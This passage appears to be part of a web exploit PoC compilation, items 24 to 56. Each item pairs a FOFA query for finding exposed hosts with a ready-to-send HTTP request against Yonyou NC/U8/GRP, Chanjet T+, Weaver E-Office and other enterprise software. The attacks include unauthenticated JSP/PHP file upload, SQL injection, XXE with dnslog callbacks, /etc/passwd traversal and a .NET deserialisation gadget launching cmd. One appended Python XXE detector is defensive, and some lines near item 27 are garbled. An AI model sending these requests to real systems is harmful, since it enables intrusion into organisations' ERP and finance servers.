" d. t6 \& z+ Y
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The uploaded part is a harmless .txt; the JSP destination path (including the .jsp extension) is supplied separately in the fname field, which is where the check must be applied.

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA: app="用友-UFIDA-NC"
The dsname parameter is passed to a JNDI lookup; the PoC only points it at a DNSLOG LDAP URL to confirm the lookup happens.

POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA: app="用友-UFIDA-NC"

GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

4 \8 b: U: O5 @8 n: t27. 用友 NC showcontent SQL注入
' c2 F: |' r0 `4 d0 MFOFA:icon_hash="1085941792"
2 u$ n: {! u0 W7 Z& nGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
- _# a. |/ C3 r6 B$ ^Host: your-ip8 d8 o' B1 }$ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. Y2 |, ~! H5 s F, z4 v7 g
Accept-Encoding: identity: W7 f9 r) n. }, y6 X6 j: b
Connection: close2 M3 L5 e8 E9 |& c' j( O( q. a
Content-Type: text/xml; charset=utf-8, z5 W. o5 \' ]) I
- [3 N1 j# O6 G( p( ^
# b) B+ O" U8 m* e
28. Yonyou NC grouptemplet arbitrary file upload
FOFA: icon_hash="1085941792"

POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Path of the uploaded file as given by the source:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"

GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
The injection is in the billitem query parameter; the multipart body only has to be present so the handler runs.

POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <= 6.5
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"

GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA: app="用友-UFIDA-NC"

GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA: app="用友-UFIDA-NC"

GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA: app="用友-UFIDA-NC"

GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA: app="用友-NC-Cloud"
The filename field carries a relative path (./webapps/nc_web/1.jsp), so the traversal and the extension both live in the multipart filename. The accessToken header is the JWT shipped with the public PoC; its payload claims userCode=admin.

POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
The XML travels URL-encoded inside the msg form field; the entity reference (%26xxe1two%3b) is encoded while the declaration is not.

POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
The DOCTYPE sits inside a CDATA section of the SOAP string argument, so the outer SOAP parser treats it as text; the service then parses the string a second time and fetches the external parameter entity.

POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA: app="用友-U8-Cloud"

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA: title="u8c"
Boolean-based check: the substring of HashBytes('MD5','123456') is compared in the WHERE clause, so the response differs depending on whether the injected expression evaluates.

POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA: app="用友-U8-Cloud"

POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA: app="用友-U8-Cloud"

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA: app="用友-GRP-U8"

POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Follow-up request given by the source:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA: app="用友-GRP-U8"
The injection point is the userId element of a SOAP request, so a check that only inspects query strings and form fields will not see it.

POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA: app="用友-GRP-U8"

GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA: app="用友-GRP-U8"
This variant declares no <!ENTITY at all: the DOCTYPE itself names an external DTD, which is enough for the parser to make the outbound request.

POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

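Added example, not from the source article or any Yonyou code: a check that flags the external-entity and external-DTD declarations used in items 36, 37, 38, 40 and 45. The same two patterns are run over every decoded layer of the request, because the PoCs place the DOCTYPE in different spots: a URL-encoded form field (36, 38, 45), a raw XML body (40), a CDATA section that the service parses a second time (37), and in item 45 an external DTD with no <!ENTITY at all. The sample bodies are constructed from those PoCs with the callback hosts replaced by example.invalid names; the &lt;-escaped sample is constructed to show the last decoding layer.

```python
"""Flag XML that declares external entities or an external DTD.

Added example, not from the page or a vendor. It runs over every decoded
layer of a request body: the body itself, each URL-decoded form value, every
CDATA section, and any entity-escaped text a second parse would see.
"""
import html
import re
from typing import List
from urllib.parse import unquote_plus

# <!DOCTYPE name SYSTEM "uri"> or PUBLIC "id" "uri" with no internal subset.
DOCTYPE_EXTERNAL_RE = re.compile(
    r"<!DOCTYPE\s+[^\[>]*?\b(?:SYSTEM|PUBLIC)\b\s*([\"'])([^\"']*)\1", re.I)
# <!ENTITY name SYSTEM "uri"> and the parameter form <!ENTITY % name SYSTEM "uri">.
ENTITY_EXTERNAL_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(?:SYSTEM|PUBLIC)\b[^>]*?([\"'])([^\"']*)\3", re.I)
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)


def decoded_layers(raw: str) -> List[str]:
    """Return every text a downstream XML parser might see for this body."""
    layers = [raw]
    if "=" in raw and not raw.lstrip().startswith("<"):
        for pair in raw.split("&"):              # form-encoded: decode each value
            layers.append(unquote_plus(pair.partition("=")[2]))
    for frag in list(layers):
        layers.extend(CDATA_RE.findall(frag))    # inner document passed as a string
        if "&lt;" in frag:
            layers.append(html.unescape(frag))   # escaped XML inside a text node
    return layers


def xxe_findings(raw: str) -> List[str]:
    """One line per distinct external DTD or external entity declaration."""
    found: List[str] = []
    for frag in decoded_layers(raw):
        for m in DOCTYPE_EXTERNAL_RE.finditer(frag):
            msg = f"external DTD -> {m.group(2)}"
            if msg not in found:
                found.append(msg)
        for m in ENTITY_EXTERNAL_RE.finditer(frag):
            kind = "parameter" if m.group(1) else "general"
            msg = f"external {kind} entity {m.group(2)} -> {m.group(4)}"
            if msg not in found:
                found.append(msg)
    return found


# Constructed from items 36, 37, 40 and 45 (callback hosts replaced).
S36 = ('msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
       '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
       '<soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault>'
       '</soap:Body></soap:Envelope>%0a')
S37 = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
       'xmlns:iup="http://update.oba.uap.nc/IUpdateService"><soapenv:Body><iup:getResult>'
       '<iup:string><![CDATA[<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM '
       '"http://dtd.example.invalid/x.dtd">%aaa;%ccc;%ddd;]><xxx/>]]></iup:string>'
       '</iup:getResult></soapenv:Body></soapenv:Envelope>')
S40 = ('<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://cb.example.invalid">]>'
       '<r><a>&xxe;</a ></r>')
S45 = ('reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://cb.example.invalid">'
       '&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest')
# Constructed: escaped XML in a text node that the receiving service parses again.
S_ESCAPED = ('<soap:Body><arg>&lt;!DOCTYPE x [&lt;!ENTITY e SYSTEM &quot;file:///etc/hostname&quot;'
             '&gt;]&gt;&lt;x&gt;&amp;e;&lt;/x&gt;</arg></soap:Body>')
S_OK = '<?xml version="1.0"?><order><id>7</id></order>'

if __name__ == "__main__":
    for label, body in (("36", S36), ("37", S37), ("40", S40), ("45", S45),
                        ("escaped", S_ESCAPED), ("benign", S_OK)):
        print(label, xxe_findings(body) or "clean")
```

The DOCTYPE pattern deliberately stops at an opening bracket, so an internal subset is only reported through its individual entity declarations and item 45 is not double-counted; the dedup keeps one line per declaration even when the same text is seen raw, URL-decoded and inside CDATA.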
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA: app="用友-GRP-U8"

GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA: body="/pf/portal/login/css/fonts/style.css"

GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA: title="用友U8CRM"
DontCheckLogin=1 in the query string disables the login check, so the upload is reachable without a session.

POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA: body="用友U8CRM"
Same DontCheckLogin=1 bypass as item 48. Note the trailing space in filename="%s.php ": an extension check that compares the raw name misses it, while the filesystem write strips it.

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Resulting file path given by the source:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA: body="close closebtnmodal"
Error-based MySQL injection: extractvalue() raises an XPath error whose message carries md5(123456).

POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA: app="云时空社会化商业ERP系统"

GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA: app="泛微-EOffice"
The tfs value is spliced into a table/column expression; the /*!50000...*/ comments are MySQL version-conditional comments used to get past naive keyword filters.

POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service path traversal (listed by the source as arbitrary file upload; the PoC shown reads /etc/passwd)
FOFA: app="DPtech-SSLVPN"

/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA: app="畅捷通-TPlus"
Step 1: send the request below. The AjaxPro handler deserialises the __type-tagged storeID object, and the ObjectDataProvider gadget calls Process.Start on cmd with the Arguments shown, which writes a marker string to a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL; the marker string in the response confirms the command ran:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA: app="畅捷通-TPlus"
Step 1: obtain a Cookie from the CheckPassword endpoint:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
Same ObjectDataProvider -> Process.Start gadget as item 54, reached through a different AjaxPro handler; this PoC only pings a DNSLOG host.

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
